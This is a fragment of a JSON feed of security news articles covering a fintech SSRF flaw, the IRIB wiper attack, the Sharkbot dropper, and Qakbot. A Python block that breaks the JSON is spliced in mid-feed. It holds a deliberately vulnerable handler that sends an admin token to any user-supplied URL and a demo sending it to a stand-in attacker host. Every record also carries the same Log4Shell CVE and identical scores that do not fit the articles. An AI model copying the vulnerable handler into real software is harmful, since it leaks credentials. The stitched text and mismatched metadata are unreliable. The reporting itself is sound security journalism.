", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T20:41:48", "type": "threatpost", "title": "Cyberattackers Cook Up Employee Personal Data Heist for Meyer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T20:41:48", "id": "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "href": "https://threatpost.com/cyberattackers-employee-personal-data-meyer/178570/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T13:47:15", "description": "A [server-side request forgery (SSRF) flaw](<https://threatpost.com/microsoft-azure-flaws-servers-takeover/159965/>) in an API of a large financial technology (fintech) platform potentially could have compromised millions of bank customers, allowing attackers to defraud clients by controlling their bank accounts and funds, researchers have found.\n\nA team at 
[Salt Security\u2019s](<https://salt.security/>) [Salt Labs](<https://salt.security/blog-authors/salt-labs>) identified the vulnerability in an API behind a web page that supports the platform\u2019s fund-transfer functionality, which allows clients to transfer money from their accounts on the platform into their bank accounts, researchers disclosed in [a report published Thursday](<https://salt.security/blog/api-threat-research-server-side-request-forgery-on-fintech-platform-enabled-administrative-account-takeover>).\n\nThe company in question\u2014dubbed \u201cAcme Fintech\u201d to preserve its anonymity\u2014offers a \u201cdigital transformation\u201d service for banks of all sizes, allowing the institutions to move traditional banking services online. The platform has already been integrated into many banks\u2019 systems and thus has millions of active daily users, researchers said.\n\nIf the flaw had been exploited, attackers could have performed various nefarious activities by gaining administrative access to the banking system using the platform. From there they could have leaked users\u2019 personal data, accessed banking details and financial transactions, and performed unauthorized fund transfers into their own bank accounts, researchers said.\n\nUpon identifying the vulnerability, researchers reviewed their findings and provided recommended mitigation to the organization, they said.\n\n## **High Reward for Threat Actors**\n\nAPI flaws are often overlooked, but researchers at Salt Labs said in the report that they \u201csee vulnerabilities like this one and other API-related issues on a daily basis.\u201d\n\nIndeed, 95 percent of organizations experienced an API security incident in the past 12 months, according to the company\u2019s [State of API Security](<https://salt.security/api-security-trends?>) report for the first quarter of 2022. 
This period also showed significant growth of malicious API traffic, they said.\n\n\u201c[Critical SSRF flaws](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) are more common than many FinTech providers and banking institutions realize,\u201d Yaniv Balmas, vice president of research for Salt Security, said in a press statement. \u201cAPI attacks are becoming more frequent and complex.\u201d\n\nFintech companies are especially vulnerable to compromise because their customers and partners rely on a vast network of APIs to drive interactions between various websites, mobile applications and custom integrations, among other systems, researchers said.\n\nThis, in turn, makes them \u201cprime targets by attackers looking to abuse API vulnerabilities\u201d for a couple of reasons, researchers wrote.\n\n\u201cOne, their API landscape and overall functionality is very rich and complex, which leaves a lot of room for mistakes or overlooking details in development,\u201d they wrote. \u201cTwo, if a bad actor can successfully abuse this type of platform, the potential profits are huge, since it could allow control of millions of users\u2019 bank accounts and funds.\u201d\n\n## **The Vulnerability**\n\nResearchers discovered the flaw while scanning and recording all traffic sent and received across the organization\u2019s website. 
On a page that connects clients to various banks so they can transfer funds to their bank accounts, researchers discovered an issue with the API the browser calls to handle the request.\n\n\u201cThis specific API is using the endpoint located at \u2018/workflows/tasks/{TASK_GUID}/values,\u2019 the HTTP method used to call it is PUT, and the specific request data is sent in the HTTP body section,\u201d researchers explained.\n\nThe request also carries a JWT bearer token, a cryptographically signed token that tells the server who the requesting user is and what permissions they have.\n\nThe flaw was in the request parameters that send the required data for a funds transfer\u2014specifically a parameter called \u201cInstitutionURL,\u201d researchers explained. This is a user-provided value containing a URL that points to a GUID value hosted on the receiving bank\u2019s website.\n\nThe web server handled this user-supplied URL by contacting it directly, which is an SSRF: whatever URL a client placed in the parameter in place of the legitimate bank\u2019s URL, the server would fetch it, researchers explained.\n\n## **Exposing the SSRF Flaw**\n\nResearchers demonstrated this flaw by crafting a request containing their own domain. The connection to their server was made successfully, proving that \u201cthe server blindly trusts domains provided to it in this parameter and issues a request to that URL,\u201d they wrote.\n\nFurther, the request that came into their server included a JWT token used for authentication, which turned out to be different from the token included in the original request.\n\nResearchers embedded the new JWT token into a request they\u2019d previously encountered to an endpoint named \u201c/accounts/account,\u201d which had allowed them to retrieve information from a bank account. 
This time they returned even more information, they said.\n\n\u201cThe API endpoint recognized our new JWT administrative token and very gracefully returned a list of every user and its details across the platform,\u201d researchers revealed.\n\nTrying the request again to an endpoint named \u201c/transactions/transactions\u201d with the new token also allowed them to access a list of all transactions made by every user on the banking system, they said.\n\n\u201cThis vulnerability is a critical flaw, one that completely compromises every bank user,\u201d researchers said. \u201cHad bad actors discovered this vulnerability, they could have caused serious damage for both [the organization] and its users.\u201d\n\nSalt Labs hopes that shining a light on API threats will inspire security practitioners to take a closer look at how their systems may be vulnerable in this way, Balmas said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-07T13:46:17", "type": "threatpost", "title": "SSRF Flaw in Fintech Platform Allowed for Compromise of Bank Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
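The two defects described above, a server that fetches whatever URL a client places in InstitutionURL and an outbound call that carries a privileged JWT, shown as a vulnerable fund-transfer handler beside a hardened one. This is an added example, not code from Salt Labs or from the fintech platform; the hostnames, the service token, the institution allowlist and the `send` callback are constructed assumptions so that it runs offline.

```python
"""SSRF in a user-supplied callback URL: vulnerable handler beside a hardened one.

Added example, not the platform's or Salt Labs' code. Every name below
(InstitutionURL, SERVICE_JWT, REGISTERED_INSTITUTIONS, send) is constructed.
"""
from __future__ import annotations

import ipaddress
from typing import Callable, Mapping
from urllib.parse import urlsplit, urlunsplit

# Constructed stand-in for the platform's own administrative JWT. Not a real token.
SERVICE_JWT = "eyJhbGciOiJIUzI1NiJ9.CONSTRUCTED-ADMIN-CLAIMS.CONSTRUCTED-SIGNATURE"

# Constructed allowlist: hostnames of institutions actually registered on the platform.
REGISTERED_INSTITUTIONS: frozenset[str] = frozenset({"bank-a.example", "bank-b.example"})

# send(method, url, headers) -> HTTP status. Injected so the example never touches the network.
Sender = Callable[[str, str, Mapping[str, str]], int]


class InstitutionURLError(ValueError):
    """Raised when InstitutionURL fails validation."""


def validate_institution_url(url: str, allowlist: frozenset[str] = REGISTERED_INSTITUTIONS) -> str:
    """Return a normalized URL if it points at a registered institution over HTTPS.

    Rejects non-HTTPS schemes, userinfo tricks (https://bank-a.example@evil/),
    IP-literal hosts (loopback, link-local metadata addresses, ...), non-standard
    ports, and any host not on the allowlist.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() != "https":
        raise InstitutionURLError("only https:// institution URLs are accepted")
    if parts.username is not None or parts.password is not None:
        raise InstitutionURLError("userinfo in InstitutionURL is not allowed")
    host = parts.hostname  # already lower-cased by urlsplit
    if not host:
        raise InstitutionURLError("InstitutionURL has no host")
    try:
        ipaddress.ip_address(host)
    except ValueError:
        pass  # a hostname, as expected
    else:
        raise InstitutionURLError("IP-literal hosts are not allowed")
    try:
        port = parts.port
    except ValueError as exc:
        raise InstitutionURLError("malformed port") from exc
    if port not in (None, 443):
        raise InstitutionURLError("non-standard port is not allowed")
    if host not in allowlist:
        raise InstitutionURLError(f"{host} is not a registered institution")
    # Rebuild with a normalized netloc and drop the fragment (never sent anyway).
    return urlunsplit(("https", host, parts.path or "/", parts.query, ""))


def is_allowed_institution_url(url: str) -> bool:
    try:
        validate_institution_url(url)
        return True
    except InstitutionURLError:
        return False


def vulnerable_handle_transfer(body: Mapping[str, str], send: Sender) -> int:
    """Behaviour the article describes: contact whatever URL the client supplied and
    authenticate the outbound call with the platform's own service token."""
    return send("GET", body["InstitutionURL"], {"Authorization": f"Bearer {SERVICE_JWT}"})


def hardened_handle_transfer(body: Mapping[str, str], send: Sender,
                             institution_tokens: Mapping[str, str]) -> int:
    """Hardened form: allowlist the destination and send only a credential scoped to
    that institution. The service JWT is never placed on the wire."""
    url = validate_institution_url(body["InstitutionURL"])
    host = urlsplit(url).hostname
    token = institution_tokens.get(host)
    if token is None:
        raise InstitutionURLError(f"no credential provisioned for {host}")
    return send("GET", url, {"Authorization": f"Bearer {token}"})


def demo() -> dict:
    """Run both handlers against an attacker-controlled InstitutionURL (constructed)
    and report what each one would have put on the wire."""
    sent: list[dict] = []

    def record(method: str, url: str, headers: Mapping[str, str]) -> int:
        sent.append({"method": method, "url": url, "headers": dict(headers)})
        return 200

    attacker_body = {"InstitutionURL": "https://attacker.example/collect"}
    vulnerable_handle_transfer(attacker_body, record)
    try:
        hardened_handle_transfer(attacker_body, record, {"bank-a.example": "constructed-bank-a-token"})
        hardened_blocked = False
    except InstitutionURLError:
        hardened_blocked = True
    return {
        "leaked_to_attacker": sent[0]["headers"]["Authorization"] == f"Bearer {SERVICE_JWT}",
        "hardened_blocked": hardened_blocked,
        "outbound_calls": len(sent),
    }
```

The allowlist check closes the SSRF as described, but a hostname allowlist alone does not stop DNS rebinding: in production the outbound client should also resolve the host, refuse private or link-local results, and pin the connection to the resolved address (or route all institution calls through an egress proxy that enforces the same list). Separately, even a correctly allowlisted call must not carry the platform's administrative token, which is what let the researchers pivot to `/accounts/account` and `/transactions/transactions`.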
"cvelist": ["CVE-2021-44228"], "modified": "2022-04-07T13:46:17", "id": "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "href": "https://threatpost.com/ssrf-flaw-fintech-bank-accounts/179247/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:47", "description": "Footage of opposition leaders calling for the assassination of Iran\u2019s Supreme Leader ran on several of the nation\u2019s state-run TV channels in late January after a cyber-attack on Iranian state broadcaster IRIB.\n\nThe incident \u2013 one of a series of politically motivated attacks in Iran that have occurred in the last year \u2013 included the use of a wiper that potentially ties it to a previous high-profile attack on Iran\u2019s national transportation networks in July, according to researchers from Check Point Research.\n\nHowever, though the earlier attacks have been attributed to [the threat actor Indra](<https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/>), researchers believe a copycat actor was behind the IRIB attack based on the malware and tools used, they said in a [report](<https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/>) published Friday.\n\n\u201cAmong the tools used in the attack, we identified malware that takes screenshots of the victims\u2019 screens, several custom-made backdoors, and related batch scripts and configuration files used to install and configure the malicious executables,\u201d researchers wrote in the report. \u201cWe could not find any evidence that these tools were used previously, or attribute them to a specific threat actor.\u201d\n\nThe disruptive attack on IRIB occurred on Jan. 
27, with attackers showing a savviness and knowledge of how to infiltrate systems that suggest it may also have been an inside job, researchers said.\n\nThe attack managed to bypass security systems and network segmentation, penetrate the broadcaster\u2019s networks, and produce and run malicious tools that relied on internal knowledge of the broadcasting software used by the victims, \u201call while staying under the radar during the reconnaissance and initial intrusion stages,\u201d they noted.\n\nIndeed, nearly two weeks after the attack happened, news media affiliated with the opposition group MEK [published](<https://english.mojahedin.org/news/iran-despite-utilizing-all-resources-after-12-days-regimes-radio-and-tv-networks-have-not-returned-to-a-normal-status/>) a status report claiming that state-run radio and TV networks still had not returned to normal, and that more than 600 servers, along with advanced digital production, archiving and broadcasting equipment for radio and television, had been destroyed.\n\n## **Spate of Attacks**\n\nIran\u2019s national infrastructure has been the victim of a wave of attacks aimed at causing serious disruption and damage. Two incidents that targeted national transportation infrastructure occurred on consecutive days in July.\n\nOne was a [rail-transportation incident](<https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/>) \u2013 which disrupted rail service and also taunted Iran\u2019s Supreme Leader Ayatollah Sayyid Ali Hosseini Khamenei via hacked public transit display screens. 
A day later, Iran\u2019s Ministry of Roads and Urban Development also [was hit with a cyber-attack](<https://www.reuters.com/world/middle-east/iran-transport-ministry-hit-by-second-apparent-cyberattack-days-2021-07-10/>) that took down employees\u2019 computer systems.\n\nThen in October, an attack on Iran\u2019s fuel-distribution network [stranded drivers](<https://threatpost.com/cyberattack-cripples-iranian-fuel-distribution-network/175794/>) at fuel pumps across the country by disabling government-issued electronic cards providing subsidies that many Iranians use to purchase fuel at discounted prices.\n\nCheck Point researchers analyzed tools in the IRIB cyber-attack and compared them with those of Indra, the group believed to be responsible for the previous attacks in Iran\u2019s infrastructure. Specifically, a novel wiper called Meteor \u2013 which not only wipes files but also can change users\u2019 passwords, disable screensavers, terminate processes and disable recovery mode, among other nefarious features \u2013 was used in both the railway and roads attacks.\n\nHowever, though a wiper was used against IRIB, it doesn\u2019t appear to be the same one. Nor are the threat actors behind it likely the same, though a copycat situation may be at play, researchers concluded.\n\n\u201cAlthough these wipers are coded and behave very differently, some implementation details such as execution based on batch files, or the password changing patterns ([random sequence]aA1! for this attack and Aa153![random sequence] in Indra\u2019s case), suggests that the attackers behind the IRIB hack may have been inspired by previous attacks [that] happened in Iran,\u201d they wrote in the report.\n\n## **Claiming Responsibility**\n\nIt\u2019s still unclear who, exactly, the perpetrators of the IRIB attack are, however. 
While Iranian officials believe the Iranian opposition political party MEK is behind the attack, the group itself has denied involvement, researchers said.\n\nFurther, hacktivist group Predatory Sparrow, which claimed responsibility for the previous three infrastructure attacks, also affiliated itself with the IRIB attack via its Telegram channel. However, this is unlikely, as \u201cno technical proof of the group\u2019s attribution to the attack has been discovered,\u201d according to Check Point.\n\nWhat is known about the threat actor, however, is that due to the relative complexity of the attack itself, the group \u201cmay have many capabilities that have yet to be explored,\u201d researchers noted.\n\nAt the same time, a reliance on IRIB insiders may have been the secret to the attackers\u2019 success, as the tools they used are of \u201crelatively low quality and sophistication, and are launched by clumsy and sometimes buggy 3-line batch scripts,\u201d according to Check Point.\n\n\u201cThis might support the theory that the attackers might have had help from inside the IRIB, or indicate a yet unknown collaboration between different groups with different skills,\u201d researchers noted.\n\n## **Specific Malware**\n\nWhile researchers said they are still not sure how the attackers gained initial access to IRIB networks, they managed to retrieve and analyze malware related to the later stages of the attack that did three things: established backdoors and their persistence, launched the video or audio track playing the assassination message, and installed the wiper to disrupt operations in the hacked networks.\n\nAttackers used four backdoor components in the attack: WinScreeny, HttpCallbackService, HttpService and ServerLaunch, a dropper that launches HttpService.\n\nWinScreeny is a backdoor with the main purpose of capturing screenshots of the victim\u2019s computer. 
HttpCallbackService is a remote-administration tool (RAT) that communicates with the command-and-control (C2) server every five seconds to receive commands to execute. HttpService is a backdoor that listens on a specified port and can execute commands, manipulate local files, download or upload files, or perform other malicious activities.\n\nFinally, the ServerLaunch dropper \u2013 which starts both httpservice2 and httpservice4, each of which has a different predefined port to listen on \u2013 likely allows the attackers to ensure some sort of redundancy of the C2 communication, researchers wrote.\n\n## **Hijacking the Video Stream**\n\nTo interrupt the TV stream and play the opposition\u2019s message, attackers used a program called SimplePlayout.exe, a .NET-based executable with a single functionality: to play a video file in a loop using the .NET MPlatform SDK by Medialooks.\n\nTo kill the video stream already playing so they could deploy their own, the attackers used a batch script called playjfalcfgcdq.bat, which killed the running process and deleted the executable of TFI Arista Playout Server, a software that the IRIB is [known](<http://rd.irib.ir/documents/25760057/f39f659c-8a0b-42f3-a1e9-d716cd5b8afe>) to use for broadcasting.\n\nAttackers connected the dots with a script, layoutabcpxtveni.bat, that made the necessary connections to replace the IRIB video content with their own through a series of functions, including the launch of SimplePlayout.exe, researchers wrote.\n\n## **The Wiper**\n\nIn analyzing the wiper used in the attacks, researchers found \u201ctwo identical .NET samples named msdskint.exe whose main purpose is to wipe the computer\u2019s files, drives, and MBR,\u201d they reported.\n\nThe malware also has the capability to clear Windows Event Logs, delete backups, kill processes and change users\u2019 passwords, among other features.\n\nTo corrupt files, the wiper has three modes: default, which overwrites the first 200 bytes of each chunk 
of 1024 bytes with random values; light-wipe, which overwrites a number of chunks specified in the configuration; and full_purge, which does just that \u2013 overwrites the entire file content.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T13:46:04", "type": "threatpost", "title": "Iranian State Broadcaster Clobbered by \u2018Clumsy, Buggy\u2019 Code", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-18T13:46:04", "id": "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "href": "https://threatpost.com/iranian-state-broadcaster-clumsy-buggy-code/178524/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-08T16:20:58", "description": "Researchers have found the info-stealing Android malware Sharkbot lurking unsuspected in the depths of the Google Play store under the cover of anti-virus (AV) solutions.\n\nWhile analyzing suspicious applications on the store, the Check Point Research (CPR) team found what purported to be genuine AV solutions downloading and installing the malware, which steals credentials and banking 
info from Android devices but also has a range of other unique features.\n\n\u201cSharkbot lures victims to enter their credentials in windows that mimic benign credential input forms,\u201d CPR researchers Alex Shamsur and Raman Ladutska wrote in a [report](<https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/>) published Thursday. \u201cWhen the user enters credentials in these windows, the compromised data is sent to a malicious server.\u201d\n\nResearchers discovered six different applications\u2014including ones named Atom Clean-Booster, Antivirus; Antvirus Super Cleaner; and Center Security-Antivirus\u2014spreading Sharkbot. The apps came from three developer accounts\u2013Zbynek Adamcik, Adelmio Pagnotto and Bingo Like Inc.\u2014at least two of which were active in the autumn of last year. The timeline makes sense, as Sharkbot [first came onto researchers\u2019](<https://blog.malwarebytes.com/trojans/2021/11/sharkbot-android-banking-trojan-cleans-users-out/>) radar screens in November.\n\n\u201cSome of the applications linked to these accounts were removed from Google Play, but still exist in unofficial markets,\u201d researchers wrote. \u201cThis could mean that the actor behind the applications is trying to stay under the radar while still involved in malicious activity.\u201d\n\nGoogle removed the offending applications, but not before they were downloaded and installed about 15,000 times, researchers said. Primary targets of Sharkbot are users in the United Kingdom and Italy, as was previously the case, they said.\n\n## **Unique Aspects**\n\nCPR researchers peered under the hood of Sharkbot and uncovered not only typical info-stealing tactics, but also some characteristics that set it apart from typical Android malware, researchers said. 
It includes a geofencing feature that selects users based on geographic areas, ignoring users from China, India, Romania, Russia, Ukraine or Belarus, they said.\n\nSharkbot also boasts some clever techniques, researchers noted. \u201cIf the malware detects it is running in a sandbox, it stops the execution and quits,\u201d they wrote.\n\nAnother unique hallmark of the malware is that it makes use of a domain generation algorithm (DGA), a technique rarely seen in malware for the Android platform, researchers said.\n\n\u201cWith DGA, one sample with a hardcoded seed generates seven domains per week,\u201d they wrote. \u201cIncluding all the seeds and algorithms we have observed, there is a total of 56 domains per week, i.e., 8 different combinations of seed/algorithm.\u201d\n\nResearchers observed 27 versions of Sharkbot in their research; the main differences between versions were the DGA seeds and the botnetID and ownerID fields, they said.\n\nAll in all, Sharkbot implements 22 commands that allow various malicious actions to be executed on a user\u2019s Android device, including: requesting permission to send SMS messages; uninstalling a given application; sending the device\u2019s contact list to a server; disabling battery optimization so Sharkbot can run in the background; and imitating the user\u2019s swipe over the screen.\n\n## **Timeline of Activity**\n\nResearchers first discovered four applications of the Sharkbot dropper on Google Play on Feb. 25 and reported their findings to Google on March 3. Google removed the applications on March 9, but another Sharkbot dropper was discovered six days later, on March 15.\n\nCPR reported this third dropper immediately and then found two more Sharkbot droppers on March 22 and March 27, which they also reported quickly to Google for removal.\n\nThe droppers by which Sharkbot spreads in and of themselves should raise concern, researchers said. 
\u201cAs we can judge by the functionality of the droppers, their possibilities clearly pose a threat by themselves, beyond just dropping the malware,\u201d they wrote in the report.\n\nSpecifically, researchers found the Sharkbot dropper masquerading as the following applications on Google Play:\n\n * com.abbondioendrizzi.tools[.]supercleaner\n * com.abbondioendrizzi.antivirus.supercleaner\n * com.pagnotto28.sellsourcecode.alpha\n * com.pagnotto28.sellsourcecode.supercleaner\n * com.antivirus.centersecurity.freeforall\n * com.centersecurity.android.cleaner\n\nThe droppers also have a few of their own evasion tactics, such as detecting emulators and quitting if one is found, researchers noted. They also are able to inspect and act on all the UI events of the device as well as replace notifications sent by other applications.\n\n\u201cIn addition, they can install an APK downloaded from the CnC, which provides a convenient starting point to spread the malware as soon as the user installs such an application on the device,\u201d researchers added.\n\n## **Google Play Under Fire**\n\nGoogle has [long struggled](<https://threatpost.com/google-play-malware-spy-trojans/164601/>) with the persistence of malicious applications and [malware](<https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/>) on its Android app store and has made significant efforts to clean up its act.\n\nHowever, the emergence of Sharkbot disguised as AV solutions shows that attackers are getting sneakier in how they hide their malicious activity on the platform, and could serve to damage users\u2019 confidence in Google Play, noted a security professional.\n\n\u201cMalware apps that conceal their malicious functionality with time delays, code obfuscation and geofencing can be challenging to detect during the app review process, but the regularity that they are discovered lurking in official app stores really damages user trust in the safety of all apps on the platform,\u201d observed 
Chris Clements, vice president of solutions architecture at security firm [Cerberus Sentinel](<https://www.cerberussentinel.com/>), in an email to Threatpost.\n\nWith the smartphone at the center of people\u2019s digital lives and acting as a hub of financial, personal and work activity, \u201cany malware that compromises the security of such a central device can do significant financial or reputational damage,\u201d he added.\n\nAnother security professional urged Android users to be cautious when deciding whether or not to download a mobile app from a reputable vendor\u2019s store, even if it\u2019s a trusted brand.\n\n\u201cWhen installing apps from various technology stores, it is best to research the app before downloading it,\u201d observed James McQuiggan, security awareness advocate at [KnowBe4](<http://www.knowbe4.com/>). \u201cCybercriminals love to trick users into installing malicious apps with hidden functionalities in an attempt to steal data or take over accounts.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-08T16:06:29", "type": "threatpost", "title": "Google Play Bitten by Sharkbot Info-stealer \u2018AV Solution\u2019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-08T16:06:29", "id": "THREATPOST:48A631F2D45804C677BB672F838F29DA", "href": "https://threatpost.com/google-play-bitten-sharkbot/179252/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T13:12:25", "description": "The Qakbot botnet is getting more dangerous, sinking its fangs into email threads and injecting malicious modules to pump up the core botnet\u2019s powers.\n\nOn Thursday, Sophos published a [deep dive](<https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/>) into the botnet, describing how researchers have recently seen it spreading through [email thread hijacking](<https://threatpost.com/attackers-hijack-email-threads-proxylogon-proxyshell/176496/>) \u2013 an attack in which malware operators inject malspam replies into ongoing email threads.\n\nIn a recent campaign, Qakbot has also been sucking up system info, Sophos said. \u201cThe botnet spreads through email thread hijacking and collects a wide range of profile information from newly infected machines, including all the configured user accounts and permissions, installed software, running services, and more,\u201d according to the writeup, after which the botnet downloads the malicious modules.\n\nThe Qakbot malware code uses unusual encryption to obscure the contents of its communications, but Sophos researchers managed to decrypt the malicious modules and decode the botnet\u2019s command-and-control (C2) system to work out how Qakbot receives its marching orders.\n\n## Beyond Annoying\n\n[Qakbot](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>), aka QBot, QuackBot and Pinkslipbot, is a banking trojan that was first spotted in the wild 15 years ago, in 2007. 
Since its toddler days, it\u2019s become one of the most prevalent banking trojans found around the world.\n\nThough its main purpose is info-swiping \u2013 e.g., ripping off logins, passwords and more \u2013 the malware has picked up myriad other nasty habits: spying on financial operations, spreading and installing ransomware, keystroke logging, backdoor functionality, and smooth moves to evade detection, including detecting its environment, self-updating, and cryptor/packer updates. It also fights back against being analyzed and debugged, be it by experts or automated tools.\n\n\u201cQakbot is a modular, multi-purpose botnet spread by email that has become increasingly popular with attackers as a malware delivery network, like Trickbot and Emotet,\u201d said Andrew Brandt, principal threat researcher at Sophos. \u201cSophos\u2019 deep analysis of Qakbot reveals the capture of detailed victim profile data, the botnet\u2019s ability to process complex sequences of commands, and a series of payloads to extend the functionality of the core botnet engine.\u201d\n\nIn a nutshell, Qakbot isn\u2019t your dad\u2019s commodity bot, Brandt said: \u201cThe days of thinking of \u2018commodity\u2019 bots as merely annoying are long gone.\u201d\n\n## Infection Chain and Payloads\n\nSophos analyzed a campaign in which the Qakbot botnet inserted malicious messages into existing email threads: messages that included a short sentence and a link to download a zip file containing a malicious Excel spreadsheet. The message asked the targeted user to \u201cenable content\u201d to activate the infection chain.\n\nOnce the botnet infected a target, it scanned the machine to build a detailed profile that it then passed up to the C2 server. 
Then, the botnet downloaded more malicious modules, at least three.\n\nThe payloads, which were injected into browsers, took the form of dynamic link libraries (DLLs) that broadened the botnet\u2019s capabilities to include these unsavory tidbits:\n\n * A module that injects password-stealing code into webpages,\n * A module that performs network scans, collecting data about other machines in proximity to the infected computer, and\n * A module that identified the addresses of a dozen SMTP (Simple Mail Transfer Protocol) email servers and then tried to connect to each one and send spam.\n\n## Qak Off, Qakbot\n\nBrandt recommended that security teams take Qakbot infections seriously, investigating every infection and scrubbing networks clean of \u201cevery trace\u201d of the multi-talented malware. Botnet infections are, after all, a known precursor to a ransomware attack, Brandt wrote.\n\nIt\u2019s not just ransomware that sys admins have to brace for. There\u2019s also the prospect of botnet developers selling or leasing their access to your breached network, Brandt warned. \u201cFor example, Sophos has encountered Qakbot samples that deliver [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) beacons directly to an infected host,\u201d he said. \u201cOnce the Qakbot operators have used the infected computer they can transfer, lease out or sell access to these beacons to paying customers.\u201d\n\nSophos has tips on avoiding infection:\n\n * Approach unusual or unexpected emails with caution, even when the messages appear to be replies to existing email threads. \u201cIn the Qakbot campaign investigated by Sophos, a potential red flag for recipients was the use of Latin phrases in URLs,\u201d Sophos advised.\n * Security teams should check that the behavioral protections provided by their security technologies prevent Qakbot infections from taking hold. 
